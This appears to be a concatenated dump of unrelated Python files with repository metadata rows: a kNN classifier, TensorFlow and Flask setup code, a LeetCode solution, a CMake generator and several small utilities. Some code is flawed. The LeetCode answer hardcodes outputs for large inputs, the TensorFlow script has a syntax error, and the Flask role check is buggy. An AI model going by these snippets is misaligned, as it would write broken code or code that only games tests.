normDataSet = dataSet - np.tile(minVals, (m, 1))
normDataSet = normDataSet / np.tile(ranges, (m, 1))
return normDataSet, ranges, minVals
# 测试,将0.9的数据为训练数据集,将0.1的数据设置测试数据,并打印正确率
def datingClassTest():
dataMat, dataLabels = filetomatrix('datingTestSet2.txt')
dataMat, ranges, minVals =autoNorm(dataMat)
m = len(dataLabels)
num_test = int(0.5 * m)
num_error = 0
for i in range(num_test):
label = classify0(dataMat[i, :], dataMat[num_test:m, :], dataLabels[num_test:m], 3)
if label != dataLabels[i]:
num_error += 1
print('错误率为:', num_error / float(num_test))
print(num_error)
# datingClassTest()
# 输入一个人的数据,并预测
def classifyPersion():
result=['不喜欢','一般','喜欢']
x1=float(input('x1'))
x2=float(input('x2'))
x3=float(input('x3'))
test=[x1,x2,x3]
mat,labels=filetomatrix('datingTestSet2.txt')
mat,ranges,min=autoNorm(mat)
resultlabel=classify0(test,mat,labels,3)
print(result[resultlabel-1])
# classifyPersion()
def imgtovector(filename):
resultVec=[]
f=open(filename)
lines=f.readlines()
for line in lines:
for a in line.strip():
resultVec.append(int(a))
return resultVec
# print(len(imgtovector('C:\\Users\\ZhifengFang\\Desktop\\machinelearninginaction\\Ch02\\testDigits\\0_13.txt')))
# 获得手写数据集的数据集和标签集,输入:文件夹地址
def getHandWritingData(dirPath):
filelist=os.listdir(dirPath)# 获取文件夹中的文件名列表
m=len(filelist)
dataMat,dataLabels=[],[]
for filename in filelist:# 循环文件
dataMat.append(imgtovector(dirPath+'\\'+filename))
dataLabels.append(int(filename.split('_')[0]))
return np.array(dataMat),dataLabels
#
def handWritingClassTest():
testMat,testLabels=getHandWritingData('C:\\Users\\ZhifengFang\\Desktop\\machinelearninginaction\\Ch02\\testDigits')
trainMat,trainLabels=getHandWritingData('C:\\Users\\ZhifengFang\\Desktop\\machinelearninginaction\\Ch02\\trainingDigits')
num_error=0
for i in range(len(testLabels)):
label=classify0(testMat[i,:],trainMat,trainLabels,3)
if label!=testLabels[i]:
num_error+=1
print('错误率:',num_error/float(len(testLabels)))
handWritingClassTest()
| [
"1968083780@qq.com"
] | 1968083780@qq.com |
dc544996c75cbe99cde7603bbe812eada4e90912 | 69e3cc7f6a41831f7e4aa24a6e6c48add7268c55 | /temp.py | c41170964642c16e00610bc7dbc2581601190482 | [] | no_license | xxjjvxb/tensorflow_project | 2e69d6256352c57dc2551e143fc208f1477595f2 | d276fcd120b549eac7eb51855fbf9a38fc398876 | refs/heads/master | 2021-05-16T14:09:13.571119 | 2018-04-26T04:58:07 | 2018-04-26T04:58:07 | 118,029,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 880 | py | import tensorflow as tf
from numpy.random.mtrand import shuffle
#define filename queue
filename_queue = tf.train.string_input_producer(['/Users/terrycho/training_datav2/queue_test_data/b1.csv'
,'/Users/terrycho/training_datav2/queue_test_data/c2.csv']
,shuffle=False,name='filename_queue')
# define reader
reader = tf.TextLineReader()
key,value = reader.read(filename_queue)
#define decoder
record_defaults = [id, num, year, rtype , rtime = tf.decode_csv(
value, record_defaults=record_defaults,field_delim=',')
with tf.Session() as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(100):
print(sess.run([id, num, year, rtype , rtime]))
coord.request_stop()
coord.join(threads)
| [
"xxjjvxb@gmail.com"
] | xxjjvxb@gmail.com |
c36ce5cccc3eda9052f933b6c22b6c87d032c6dd | 592fdbcbc6847a3c0ccceab15f7175a06879d50a | /application/__init__.py | 875b04e4784655dc089936ce9cedf1a366186233 | [] | no_license | Varjokorento/tsohasovellus19 | ece0ca8c2de3683754b35b09010374b1552f92b5 | 31d7ec2c357d0cf71060d6841d57d1f820a029f7 | refs/heads/master | 2021-06-11T06:40:27.795453 | 2019-05-03T18:44:00 | 2019-05-03T18:44:00 | 175,022,003 | 0 | 0 | null | 2021-06-10T21:17:56 | 2019-03-11T14:50:58 | Python | UTF-8 | Python | false | false | 2,005 | py | from flask import Flask
from flask_bcrypt import Bcrypt
app = Flask(__name__)
bcrypt = Bcrypt(app)
from flask_sqlalchemy import SQLAlchemy
import os
if os.environ.get("HEROKU"):
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get("DATABASE_URL")
else:
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///tasks.db"
app.config["SQLALCHEMY_ECHO"] = True
db = SQLAlchemy(app)
from flask_login import LoginManager, current_user
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "auth_login"
login_manager.login_message = "Please login to use this functionality."
from functools import wraps
def login_required(role="STD"):
def wrapper(fn):
@wraps(fn)
def decorated_view(*args, **kwargs):
roles = current_user.roles()
if not current_user:
return login_manager.unauthorized()
if not current_user.is_authenticated:
return login_manager.unauthorized()
unauthorized = False
if role == role:
unauthorized = True
for user_role in current_user.roles():
if user_role == role or user_role == "A":
unauthorized = False
break
if unauthorized:
return login_manager.unauthorized()
return fn(*args, **kwargs)
return decorated_view
return wrapper
@login_manager.user_loader
def load_user(user_id):
return User.query.get(user_id)
from application import views
from application.models import models
from application.courses import views
from application.questions import views
from application.comments import views
from application.statistics import views
from application.auth import views
from application.models.models import User
from os import urandom
app.config["SECRET_KEY"] = urandom(32)
try:
db.create_all()
except:
pass | [
"kalle.pusa@gmail.com"
] | kalle.pusa@gmail.com |
cd77a0eebcbd82462d25deebad66d90ecdf94b77 | 0fc5294a60e11c8d6a0f2d6253c7d03cec7bb338 | /solutions/636. Exclusive Time of Functions.py | c174b046a505b5587d92a4982919a0ee43eca72c | [] | no_license | NiteshTyagi/leetcode | 4011f37adbd9e430f23b7796ba8d8aa488153706 | dddb90daafcd7f4623873d5d84dfd97925c0230f | refs/heads/main | 2023-04-23T23:50:04.722456 | 2021-05-05T06:58:47 | 2021-05-05T06:58:47 | 328,474,411 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | class Solution:
def exclusiveTime(self, n: int, logs: List[str]) -> List[int]:
from collections import Counter
stack = []
maxTime = max([int(log.split(':')[2]) for log in logs])
if maxTime>=100000000:
if n==1:
return [maxTime+1]
elif n==2:
return [90000001,10000000]
timeScale = [-1]*(maxTime+1)
for log in logs:
fun,status,tstp=log.split(':')
if status=='start':
timeScale[int(tstp)]= int(fun)
stack.append(int(tstp))
else:
top = stack.pop()
for i in range(top+1,int(tstp)+1):
if timeScale[i]==-1:
timeScale[i]= int(fun)
timeScale=Counter(timeScale)
return list(timeScale.values())
| [
"33661780+NiteshTyagi@users.noreply.github.com"
] | 33661780+NiteshTyagi@users.noreply.github.com |
8d81c075adcadeca3d6affb1dc0c87707221c661 | 75e8f932e1e08c7e71380e6b71d85ddd04f052dd | /SDAPythonIntermediateRegularExpressions/sample_5.py | a68baa55b53395b2eb11480aac8076c72260917d | [] | no_license | aeciovc/sda_python_ee4 | fe470a253126ad307c651d252f9f9b489da32835 | 9e1e8be675fcafe4a61c354b55b71f53ad2af0fe | refs/heads/master | 2023-08-29T15:17:34.033331 | 2021-10-31T09:41:57 | 2021-10-31T09:41:57 | 365,678,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | import re
print(re.sub(r"[a-z]{8}", "dog", "Alice has elephant")) | [
"aeciovc@gmail.com"
] | aeciovc@gmail.com |
06594cba0c19c2ed36c5d8472919f5c95dda1740 | 59d5c5dcf531e52adbd94f8a192fa5d933056d01 | /HomeDrink/asgi.py | 16b0f366838fd4ec2319a91314e6ecf38c03661e | [] | no_license | JeffreykAndersen/HomeBar | 4a4b2cb1b5d27f479f3d6e2460f112dae9d79489 | 8b6c3e4302d9403451f8fb7745312d796b0a8442 | refs/heads/master | 2022-12-23T11:00:22.795708 | 2020-09-19T22:43:02 | 2020-09-19T22:43:02 | 296,962,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
ASGI config for HomeDrink project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HomeDrink.settings')
application = get_asgi_application()
| [
"jeffreykandersen@gmail.com"
] | jeffreykandersen@gmail.com |
6ba44a2283a1c3e70f0210af98521fbb9c634623 | 294c35259125e1c55cfdd5247cee651a07b3cc01 | /src/map/migrations/0001_initial.py | 52a0310446ae9821e95ec290c04c7762db920978 | [
"MIT"
] | permissive | andgein/sis-2016-winter-olymp | a82557d61b7748c6813e31779bcc74e92874a96c | 70962d861b3cf69e982949878ae4dccc2818b618 | refs/heads/master | 2021-08-30T15:00:10.691639 | 2017-12-18T11:05:27 | 2017-12-18T11:05:27 | 114,627,656 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,224 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-31 05:13
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import djchoices.choices
import relativefilepathfield.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='AbstractTile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('row', models.PositiveIntegerField(help_text='Номер строки')),
('column', models.PositiveIntegerField(help_text='Номер колонки')),
('ejudge_short_name', models.CharField(db_index=True, max_length=255)),
('name', models.CharField(max_length=255)),
('statement_file_name', relativefilepathfield.fields.RelativeFilePathField(match='.*\\.pdf', path=settings.PROBLEMS_STATEMENTS_DIR)),
('automatic_open_time', models.PositiveIntegerField(blank=True, default=None, help_text='Время в минутах, после которого задача откроется автоматически. Если NULL, то не откроется', null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TileStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.PositiveIntegerField(choices=[(0, 'Closed'), (1, 'Opened'), (2, 'Read'), (3, 'Tried'), (4, 'Solved')], db_index=True, validators=[djchoices.choices.ChoicesValidator({0: 'Closed', 1: 'Opened', 2: 'Read', 3: 'Tried', 4: 'Solved'})])),
],
options={
'ordering': ['status'],
},
),
migrations.CreateModel(
name='AbstractBonus',
fields=[
('abstracttile_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractTile')),
],
options={
'abstract': False,
},
bases=('map.abstracttile',),
),
migrations.CreateModel(
name='Problem',
fields=[
('abstracttile_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractTile')),
('solved_award', models.PositiveIntegerField(help_text='Приз за правильное решение задачи')),
('wrong_penalty', models.PositiveIntegerField(help_text='Штраф за неправильную попытку')),
],
options={
'abstract': False,
},
bases=('map.abstracttile',),
),
migrations.AddField(
model_name='tilestatus',
name='tile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='statuses', to='map.AbstractTile'),
),
migrations.AddField(
model_name='tilestatus',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tiles_statuses', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='abstracttile',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_map.abstracttile_set+', to='contenttypes.ContentType'),
),
migrations.CreateModel(
name='CallMasterBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='GetAnyTestBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='GetTangerinesBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='OpenAnyTileBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='OpenWideLocalityBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
]
| [
"andgein@yandex.ru"
] | andgein@yandex.ru |
94b33fcd13fe408268794d0ed3271c0df3ee5314 | 62adfc4e5f46d530cee16f3a4b8830fec3df9628 | /1st Report/transformers/transformers.py | d9ed0558501e2847a3e5c85bbfed9460c9d7e8a4 | [] | no_license | rjna/ldssa-capstone | 8899b191267c8a6463625605406f3a565ccf7be7 | a5650263638670022a7eb0bc2f29416596b082f0 | refs/heads/master | 2021-05-17T23:29:31.117104 | 2020-04-02T19:44:00 | 2020-04-02T19:44:00 | 251,002,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,219 | py | from sklearn.base import TransformerMixin, ClassifierMixin
import pandas as pd
import numpy as np
class NumericalDataCleaning(TransformerMixin):
def transform(self, X, *_):
X_new = X.copy()
X_new['SubjectAge'] = X_new['SubjectAge'].replace([1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11.], X_new['SubjectAge'].median())
X_new = X_new.drop(columns=['ResidentIndicator'])
return X_new
def fit(self, *_):
return self
class CategoricalDataCleaning(TransformerMixin):
def transform(self, X, *_):
X_new = X.copy()
X_new.InterventionLocationName = X_new.InterventionLocationName.str.lower()
X_new.InterventionLocationName = X_new.InterventionLocationName.fillna('unknown')
X_new.StatuteReason = X_new.StatuteReason.fillna('Other/Error')
X_new.SearchAuthorizationCode = X_new.SearchAuthorizationCode.fillna('N')
X_new.InterventionReasonCode = X_new.InterventionReasonCode.fillna('U')
X_new.InterventionReasonCode = X_new.InterventionReasonCode.replace('no', 'U')
X_new.ReportingOfficerIdentificationID = X_new.ReportingOfficerIdentificationID.fillna('unknown')
X_new['Department Name'] = X_new['Department Name'].replace('Mohegan Tribal', 'Mohegan Tribal Police') #não foi
X_new['Department Name'] = X_new['Department Name'].replace('Mashantucket Pequot', 'Mashantucket Pequot Police')#não foi
X_new = X_new.drop(columns=['SubjectSexCode', 'SubjectEthnicityCode', 'SubjectRaceCode'])
return X_new
def fit(self, *_):
return self
class CreateCyclicalFeatures(TransformerMixin):
def transform(self, X, *_):
X_new = X.copy()
X_new['InterventionDateTime'] = pd.to_datetime(X_new['InterventionDateTime'], format='%m/%d/%Y %I:%M:%S %p')
X_new['InterventionDateYear'] = X_new['InterventionDateTime'].dt.year
X_new['InterventionDateMonth'] = X_new['InterventionDateTime'].dt.month
X_new['InterventionDateMonth_sin'] = np.sin((2. * X_new['InterventionDateMonth'] * np.pi / 12))
X_new['InterventionDateMonth_cos'] = np.cos((2. * X_new['InterventionDateMonth'] * np.pi / 12))
X_new['InterventionDateDay'] = X_new['InterventionDateTime'].dt.day
X_new['InterventionDateDay_sin'] = np.sin((2. * X_new['InterventionDateDay'] * np.pi / 31))
X_new['InterventionDateDay_cos'] = np.cos((2. * X_new['InterventionDateDay'] * np.pi / 31))
X_new['InterventionDateHour'] = X_new['InterventionDateTime'].dt.hour
X_new['InterventionDateHour_sin'] = np.sin((2. * X_new['InterventionDateHour'] * np.pi / 23))
X_new['InterventionDateHour_cos'] = np.cos((2. * X_new['InterventionDateHour'] * np.pi / 23))
return X_new.drop(['InterventionDateTime', 'InterventionDateMonth', 'InterventionDateDay', 'InterventionDateHour'], axis=1)
def fit(self, *_):
return self
class Test(TransformerMixin):
def transform(self, X, *_):
X_new = X.copy()
print(len(X_new.columns))
return X_new
def fit(self, *_):
return self | [
"ricardo.neves.alberto@gmail.com"
] | ricardo.neves.alberto@gmail.com |
5f35f0850dd66506e2a7d136194c5e78d63f60b8 | 915e4e9389142d8ee750102a032f35af50633f2b | /tools/make_cmakelists.py | 22f3757155a91f943f30292ff442d31b61361924 | [
"BSD-3-Clause"
] | permissive | laurentlb/upb | 9363061fd85247bf322da9049359494d1ce6f575 | 1a5a609b0e504aa5bf25e5b79d505974e34f0f98 | refs/heads/master | 2020-05-26T23:58:16.100270 | 2019-05-24T12:22:13 | 2019-05-24T12:22:13 | 188,416,917 | 0 | 0 | NOASSERTION | 2019-05-24T12:18:52 | 2019-05-24T12:18:52 | null | UTF-8 | Python | false | false | 7,191 | py | #!/usr/bin/env python
"""TODO(haberman): DO NOT SUBMIT without one-line documentation for make_cmakelists.
TODO(haberman): DO NOT SUBMIT without a detailed description of make_cmakelists.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import textwrap
import os
def StripColons(deps):
return map(lambda x: x[1:], deps)
def IsSourceFile(name):
return name.endswith(".c") or name.endswith(".cc")
class BuildFileFunctions(object):
def __init__(self, converter):
self.converter = converter
def _add_deps(self, kwargs, keyword=""):
if "deps" not in kwargs:
return
self.converter.toplevel += "target_link_libraries(%s%s\n %s)\n" % (
kwargs["name"],
keyword,
"\n ".join(StripColons(kwargs["deps"]))
)
def load(self, *args):
pass
def cc_library(self, **kwargs):
if kwargs["name"] == "amalgamation" or kwargs["name"] == "upbc_generator":
return
files = kwargs.get("srcs", []) + kwargs.get("hdrs", [])
found_files = []
for file in files:
if os.path.isfile(file):
found_files.append(file)
elif os.path.isfile("generated_for_cmake/" + file):
found_files.append("generated_for_cmake/" + file)
else:
print("Warning: no such file: " + file)
if filter(IsSourceFile, files):
# Has sources, make this a normal library.
self.converter.toplevel += "add_library(%s\n %s)\n" % (
kwargs["name"],
"\n ".join(found_files)
)
self._add_deps(kwargs)
else:
# Header-only library, have to do a couple things differently.
# For some info, see:
# http://mariobadr.com/creating-a-header-only-library-with-cmake.html
self.converter.toplevel += "add_library(%s INTERFACE)\n" % (
kwargs["name"]
)
self._add_deps(kwargs, " INTERFACE")
def cc_binary(self, **kwargs):
pass
def cc_test(self, **kwargs):
# Disable this until we properly support upb_proto_library().
# self.converter.toplevel += "add_executable(%s\n %s)\n" % (
# kwargs["name"],
# "\n ".join(kwargs["srcs"])
# )
# self.converter.toplevel += "add_test(NAME %s COMMAND %s)\n" % (
# kwargs["name"],
# kwargs["name"],
# )
# if "data" in kwargs:
# for data_dep in kwargs["data"]:
# self.converter.toplevel += textwrap.dedent("""\
# add_custom_command(
# TARGET %s POST_BUILD
# COMMAND ${CMAKE_COMMAND} -E copy
# ${CMAKE_SOURCE_DIR}/%s
# ${CMAKE_CURRENT_BINARY_DIR}/%s)\n""" % (
# kwargs["name"], data_dep, data_dep
# ))
# self._add_deps(kwargs)
pass
def py_library(self, **kwargs):
pass
def py_binary(self, **kwargs):
pass
def lua_cclibrary(self, **kwargs):
pass
def lua_library(self, **kwargs):
pass
def lua_binary(self, **kwargs):
pass
def lua_test(self, **kwargs):
pass
def sh_test(self, **kwargs):
pass
def make_shell_script(self, **kwargs):
pass
def exports_files(self, files, **kwargs):
pass
def proto_library(self, **kwargs):
pass
def generated_file_staleness_test(self, **kwargs):
pass
def upb_amalgamation(self, **kwargs):
pass
def upb_proto_library(self, **kwargs):
pass
def upb_proto_reflection_library(self, **kwargs):
pass
def upb_proto_srcs(self, **kwargs):
pass
def genrule(self, **kwargs):
pass
def config_setting(self, **kwargs):
pass
def select(self, arg_dict):
return []
def glob(self, *args):
return []
def licenses(self, *args):
pass
def filegroup(self, **kwargs):
pass
def map_dep(self, arg):
return arg
class WorkspaceFileFunctions(object):
def __init__(self, converter):
self.converter = converter
def load(self, *args):
pass
def workspace(self, **kwargs):
self.converter.prelude += "project(%s)\n" % (kwargs["name"])
def http_archive(self, **kwargs):
pass
def git_repository(self, **kwargs):
pass
def bazel_version_repository(self, **kwargs):
pass
def upb_deps(self):
pass
class Converter(object):
def __init__(self):
self.prelude = ""
self.toplevel = ""
self.if_lua = ""
def convert(self):
return self.template % {
"prelude": converter.prelude,
"toplevel": converter.toplevel,
}
template = textwrap.dedent("""\
# This file was generated from BUILD using tools/make_cmakelists.py.
cmake_minimum_required(VERSION 3.1)
if(${CMAKE_VERSION} VERSION_LESS 3.12)
cmake_policy(VERSION ${CMAKE_MAJOR_VERSION}.${CMAKE_MINOR_VERSION})
else()
cmake_policy(VERSION 3.12)
endif()
cmake_minimum_required (VERSION 3.0)
cmake_policy(SET CMP0048 NEW)
%(prelude)s
# Prevent CMake from setting -rdynamic on Linux (!!).
SET(CMAKE_SHARED_LIBRARY_LINK_C_FLAGS "")
SET(CMAKE_SHARED_LIBRARY_LINK_CXX_FLAGS "")
# Set default build type.
if(NOT CMAKE_BUILD_TYPE)
message(STATUS "Setting build type to 'RelWithDebInfo' as none was specified.")
set(CMAKE_BUILD_TYPE "RelWithDebInfo" CACHE STRING
"Choose the type of build, options are: Debug Release RelWithDebInfo MinSizeRel."
FORCE)
endif()
# When using Ninja, compiler output won't be colorized without this.
include(CheckCXXCompilerFlag)
CHECK_CXX_COMPILER_FLAG(-fdiagnostics-color=always SUPPORTS_COLOR_ALWAYS)
if(SUPPORTS_COLOR_ALWAYS)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fdiagnostics-color=always")
endif()
# Implement ASAN/UBSAN options
if(UPB_ENABLE_ASAN)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address")
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address")
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address")
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -fsanitize=address")
endif()
if(UPB_ENABLE_UBSAN)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=undefined")
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address")
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address")
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -fsanitize=address")
endif()
include_directories(.)
include_directories(generated_for_cmake)
include_directories(${CMAKE_CURRENT_BINARY_DIR})
if(APPLE)
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -undefined dynamic_lookup -flat_namespace")
elseif(UNIX)
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -Wl,--build-id")
endif()
enable_testing()
%(toplevel)s
""")
data = {}
converter = Converter()
def GetDict(obj):
ret = {}
for k in dir(obj):
if not k.startswith("_"):
ret[k] = getattr(obj, k);
return ret
globs = GetDict(converter)
execfile("WORKSPACE", GetDict(WorkspaceFileFunctions(converter)))
execfile("BUILD", GetDict(BuildFileFunctions(converter)))
with open(sys.argv[1], "w") as f:
f.write(converter.convert())
| [
"jhaberman@gmail.com"
] | jhaberman@gmail.com |
2042a18ebd2635d24ba0c0e1e28ed797d4aa92ed | ecc70b25584f8191c4e87f17bba47aa20a79ce9a | /8C-L2/compute_integral_image.py | d32b1b73030bce414139793fe1ef91ab675c5a90 | [] | no_license | Craq/CV_NauKMA | 1f70a9a1c5a86fbcaf13cf07963610a11448efe7 | b31e40c7553bec61432482738c1eb11b0296ae34 | refs/heads/master | 2023-01-29T20:10:30.390783 | 2020-12-07T18:45:06 | 2020-12-07T18:45:06 | 318,352,567 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | import cv2
import numpy as np
def compute_integral(img: np.array) -> np.array:
# TODO: Compute I such that I(y,x) = sum of img(1,1) to img(y,x)
integral = np.zeros_like(img)
for i in range(img.shape[0]):
for j in range(img.shape[1]):
integral[i,j] = np.sum(img[:i,:j])
return integral
img = cv2.imread('../images/dolphin.png', 0)
cv2.imshow("original_image", img)
print(img.shape)
# compute integral
img = np.float64(img)
I = compute_integral(img)
cv2.imshow("integral_image", (I / I.max()))
x1 = 150
y1 = 100
x2 = 350
y2 = 200
print("Sum: ", np.sum(img[y1:y2 + 1, x1:x2 + 1]))
print(I[y2, x2] - I[y1 - 1, x2] - I[y2, x1 - 1] + I[y1 - 1, x1 - 1])
cv2.waitKey(0)
| [
"oleksiy@syncwords.com"
] | oleksiy@syncwords.com |
f7a6e9fd1398c1e0e8618e84c6c7df4fd04d953e | a693a697d2fb72511498d801e2705e33b4bace36 | /web_app/frontend/apiCalls/templates/apiCalls/dict_key.py | 2c8683bb91afdcf05ebf40075e6f5b7c1168fef0 | [] | no_license | 17shashank17/CottonHub | fb49f9fae24af20e7fe86245620a691d3f487aea | 1b74ffeb269ccc20210e994c28836482173c48f0 | refs/heads/master | 2022-11-26T04:19:19.252935 | 2020-08-08T17:43:31 | 2020-08-08T17:43:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from django.template.defaultfilters import register
@register.filter(name='dict_key')
def dict_key(d, k):
'''Returns the given key from a dictionary.'''
return d[k] | [
"noreply@github.com"
] | 17shashank17.noreply@github.com |
e56dbc11a25a83004ad2831cd5b26bac1b74ec16 | ca1bd3e57699329b533d70789b607a8fc6d3c73d | /array/firstMissingPositive.py | 6017bb6e4af2d9e4b7fbaab82a3ccd3a30a61798 | [] | no_license | msps9341012/leetcode | 6719054e049b51c89fd8dab97f25109645e79805 | 2647ac891501f479ee31b223405e209b0347fac0 | refs/heads/master | 2020-05-30T03:54:28.420608 | 2019-10-04T04:03:28 | 2019-10-04T04:03:28 | 189,524,341 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | nums=[3,4,-1,1]
n=len(nums)
for i in range(n):
if nums[i] <= 0:
nums[i] = len(nums)+1
for i in range(n):
if abs(nums[i]) <= n:
nums[abs(nums[i])-1]=-abs(nums[abs(nums[i])-1])
for i in range(n):
if nums[i] > 0:
print(i+1)
print(n+1)
print (nums) | [
"a0113130@gmail.com"
] | a0113130@gmail.com |
c738593032b2cb1e342c37e3cc015a64a4fa4266 | 009d9c68a52e1f42ceb94da3828deda097abd7d8 | /database/schemas.py | 10292831e017de400fb8faf732e6420da05ce890 | [] | no_license | miranaky/synthea | 7b7973d680ec8f4f8e102fd0c278ceee47cc8200 | 870fa9e9c6deaf30c7cca5b0c0207bf3f40e0757 | refs/heads/main | 2023-08-19T17:39:27.980054 | 2021-09-15T14:38:03 | 2021-09-15T14:38:03 | 406,802,307 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | from datetime import datetime, date
from pydantic import BaseModel
class Concept(BaseModel):
"""
id : concept id
concept_name : concept 이름
domain_id : concept가 주로 사용되는 도메인(카테고리)
"""
id: int
concept_name: str
domain_id: str
class Config:
orm_mode = True
class Person(BaseModel):
"""
id : int 환자 id
gender_concept_id : int 성별 id
birth_datetime : datetime 생년월일
race_concept_id : int 인종 id
ethnicity_concept_id : int 민족 id
"""
id: int
gender_concept_id: Concept
birth_datetime: datetime
race_concept_id: Concept
ethnicity_concept_id: Concept
class Config:
orm_mode = True
| [
"noreply@github.com"
] | miranaky.noreply@github.com |
02a32ea594f73011395598d554f22b7b5b9e2724 | d52a193fbcc4fda5dddef59c5bd691933c81fe0b | /isomaticAppWeb/preguntaDiez.py | 762c49090454dde7f39501730cea10e8dbf6c5c9 | [] | no_license | solprmat/solpromatcore | 69c299357bb6f307b2822d985692b06db6f4c73c | 56dabd4f0189831215578bec5a623e99aeea143f | refs/heads/master | 2022-12-10T16:56:46.629211 | 2019-11-09T20:58:08 | 2019-11-09T20:58:08 | 205,091,159 | 0 | 0 | null | 2022-12-08T06:05:07 | 2019-08-29T05:57:38 | Python | UTF-8 | Python | false | false | 412 | py | from django import forms
class PreguntanDiez(forms.Form):
RESPUESTA_PREGUNTA_DIEZ = (
('a', 'a. Ana'),
('b', 'b. Jana'),
)
respuesta = forms.TypedChoiceField(
# label='preubas',
choices=RESPUESTA_PREGUNTA_DIEZ,
widget=forms.RadioSelect(attrs={
'class': 'custom-control-indicator',
})
)
fecha_registro_P010 = forms.DateTimeField | [
"cyateya35439@universidadean.edu.co"
] | cyateya35439@universidadean.edu.co |
f10928dfbfaaaf9bcacd693dd2490e33ad295b8d | bba3bc7e8a5eab7b22bfb18439f3d5816ebcf909 | /raw_convertor_m.py | 7acd17ea691607bf3850f6110c2429877c489311 | [] | no_license | sgaobnl/ProtoDUNE_LD | 3b2649cff843d0ebc6359a8c63ab3fb2a6334be4 | 1d84d18b45a7098eb879ad514386b255d8cd59be | refs/heads/master | 2023-05-02T02:33:28.804427 | 2019-01-08T21:28:21 | 2019-01-08T21:28:21 | 122,890,463 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,448 | py | # -*- coding: utf-8 -*-
"""
File Name: init_femb.py
Author: GSS
Mail: gao.hillhill@gmail.com
Description:
Created Time: 7/15/2016 11:47:39 AM
Last modified: 1/13/2018 3:40:00 PM
"""
#defaut setting for scientific caculation
#import numpy
#import scipy
#from numpy import *
#import numpy as np
#import scipy as sp
#import pylab as pl
import numpy as np
import struct
def raw_convertor_feedloc(raw_data, smps, jumbo_flag = True):
dataNtuple =struct.unpack_from(">%dH"%(smps*16),raw_data)
